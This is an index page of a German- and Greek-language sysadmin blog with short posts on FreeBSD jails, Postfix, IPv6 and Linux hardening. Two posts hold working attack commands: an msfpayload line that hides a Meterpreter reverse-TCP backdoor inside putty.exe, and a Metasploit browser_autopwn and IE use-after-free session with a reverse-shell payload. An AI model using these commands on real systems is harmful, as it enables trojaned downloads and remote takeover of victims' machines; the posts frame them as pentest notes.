FreeBSD, IPv6, Jails, Linux,

To content | To menu | To search

Friday 17 January 2014

NTP Sichern - bzw. Testen

Siehe http://openntpproject.org/


Eine recht gute Beschreibung zum Absichern:

  • http://wiki.euserv.de/index.php/Absicherung_von_NTP



Siehe Impresum - Keine Veranzwortung für Inhalt und weiterführende Links usw. - Ich hab nix mit weiterführenden Links zu tun und übernehme auch keine Haftung

Sunday 8 December 2013

Linux -- Unix Härten

  • Überflüssige Compiler, Libaries und Programme deinstallieren

Soweit möglich und Abhängigkeiten nicht gebrochen werden ( bei BSD muss dafür ein force ausgeführt werden). Am besten von beginn an mit Bedacht Installieren und nur eBasis installieren ohne schnikschnak

  • Rootlogin per Passwort mittels SSH unterbinden, bzw. root Login grundsätzlich verbieten, wenn dann nur per Key
  • Port des ssh-Servers ändern
  • PAM restriktiver gestalten, min PW Länge und Gültigkeit verändern, min 12 Zeichen und max. 30 Tage Gültigkeit
  • Nur ausgewählte Benutzer in Gruppe „root“ aufnehmen
  • Postfix als MTA mit Konfiguration lokaler Zustellung
  • NTP Absichern
  • Weitere packete Absichern (Apache, MySQL, Postfix, PHP usw. Beschreibungen folgen evtl. mal)



Wenn das passiert ist, dann ist schon mal die Basis für ein sicheres System geschafen.

Mit nmap das System scannen, z.B.:
nmap -v -sSV --script=vuln IP


Mit ps, top mal nachsehen was denn so alles läuft.
Mit netstat -an mal nachsehen was den so alles lauscht.
Evtl. mal lsof ausprobieren.

Wednesday 14 August 2013

metasploit Testumgebung

Dafür gibt es (nicht nur) metsploitable ;-)

Sunday 19 May 2013

Διερευνήσει στο /etc σε FreeBSD

/etc/adduser.conf
/etc/amd.map
/etc/bluetooth ....
/etc/defaults/ ....
/etc/crontab/
/etc/csh.* .....

Και μερικα με μερικα αλλα θα ασχολιθοθμε σε αφτι τη περιγραφη.....

Continue reading...

Εγκατάσταση και ρύθμιση Virtual Box

εγκαταστήστε και να ρυθμίστε
Virtual Box σε FreeBSD 9

Continue reading...

Saturday 27 April 2013

SET Socoal Engineering toolkit - PDF mit Reverse TCP generieren

Dafür gibts genug im Web :-D

Thursday 11 April 2013

metasploit reverse tcp im exe einbauen

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.156 LPORT=443 R | msfencode -e x86/shikata_ganai -c 1 -t exe -x /home/blabla/putty.exe -o /home/blabla/reverse-putty.exe

Tuesday 1 May 2012

Squid ACLs und mehr.....

Wie immer keine Garantie auf Funktion. Keine verantwortung wenn was kaputt get oder so in der Richtung.

Squid ACLś und möglichkeiten der Konfiguration

Continue reading...

Saturday 3 March 2012

Jails του FreeBSD - Δημιουργία και διαμόρφωση / FreeBSD Jails erstellen und konfigurieren

Εγκατάσταση και ρύθμιση παραμέτρων υπηρεσιών, όπως Apache, Postfix, MailScanner σε FreeBSD Jail
Services wie Apache, Postfix, Mailscanner in einer Jail installieren und konfigurieren

Continue reading...

Tuesday 31 January 2012

metasploit browser_autopwn

Με αφτο το εργαλιο, μετασπλοιτ, πρεπει να χρησιμοπιειτε με πολυ προσοχη!!!
Εκτος αφτου χρισιμοπιειτε το μονο δοκιμαστικα σε σερβερ και κλιαντ υα οπια σας ανικουν
και εχεται την αδια να ξεκινισετε ενα πεντεστ!!!!! Δεν λαμβανο καμια ευθηνη για οπιαδιποτε βλαβη προκiψει
απο καπιον που διαβασε και εφαρμοσαι αφτη την περιγραφη!



msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > set lhost SERVER IP

lhost => SERVERIP

msf auxiliary(browser_autopwn) > set srvport 8080

srvport => 8080 for WEBDAV you need user Port 80. If on Port 80 resist any other WebServer then shutdown this Server bevor start Exploit.

msf auxiliary(browser_autopwn) > set uripath ANYPATH

uripath => exploit

msf auxiliary(browser_autopwn) > exploit

* Auxiliary module execution completed






another one




msf exploit(ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ie_execcommand_uaf) > set LHOST 192.168.100.17

sLHOST => 192.168.100.17

msf exploit(ie_execcommand_uaf) > set uripath exploit

uripath => exploit

msf exploit(ie_execcommand_uaf) > exploit


Saturday 25 June 2011

FreeBSD Jail, mit smtp/postfix, pop3-imap/dovecot, mysql, apache, postfixadmin

Wie immer ohne jegliche Garantie für Funktion, keine Verantwortung für evtl. auftretende Schäden.

Das ganze auf FreeBSD 8 und den entsprechenden Ports.

zunächst ein mal ein paar Infos der zu installierenden Options:

Continue reading...

Saturday 28 May 2011

FreeBSD Jail, mit smtp, pop3-imap /postfix, dovecot und lokale User

Wie immer keine Garantie auf einwandfreie Funktion und keine Haftung für evtl entstehende Schäden.

Erst OS installieren,
ich habe eine minimale Installation v8.2 durchgeführt, direkt vom freebsd ftp server.
ich habe ipv6 aktiviert, kein nfs server oder client, kein gateway.

Continue reading...

Friday 8 April 2011

FreeBSD, Postfix, Clamav, Mailscanner mit mcp checks

Αυτή η μετάφραση στα ελληνικά είναι ελλιπής

Δεν υπάρχουν πολλά διαθέσιμες περιγραφές σχετικά με MCP.
Μια περιγραφή για την εύκολη εγκατάσταση του FreeBSD και την προετοιμασία, την εγκατάσταση ενός απλού Postfix SMTP υπηρεσίες με MailScanner και clamav.
Οι έλεγχοι MCP μπορούν να ρυθμιστούν στη συνέχεια.




Es gibt kaum verfügbare Beschreibungen bezüglich MCP.
Eine Beschreibung zur einfachen Installation von FreeBSD und die vorbereitung, Installation eines einfachen Postfix SMTP Services, mit clamav und Mailscanner.
Die MCP Checks können dann dazu konfiguriert werden, dazu genügen ein paar Einstellungen und ein paar Regeln.

Continue reading...

Wednesday 16 February 2011

FreeBSD oder debian Linux, IPv6 und RADVD

Verteilen von IPv6 Adressen Im wesentlichen ist es gleich on FreeBSd oder debian.
Unter debian ist es radvd das installiert werden muss, unter FreeBSD ist es raddvd das installiert und konfiguriert werden muss.

Die conf Datei enthält dabei das selbe.

Continue reading...

Tuesday 14 December 2010

IP Adresse des clients auf der Webseite anzeigen lassen

IP Adresse des clients anzeigen lassen

Continue reading...

Monday 1 November 2010

SIXXS IPv6 Tunnel mit Debian / FreeBSD

Mit Sixxs einen IPv6 Tunnel bauen und mit der Zeit ein IPv6 Netz erhalten.
Με Sixxs ένα δίκτυο IPv6

Continue reading...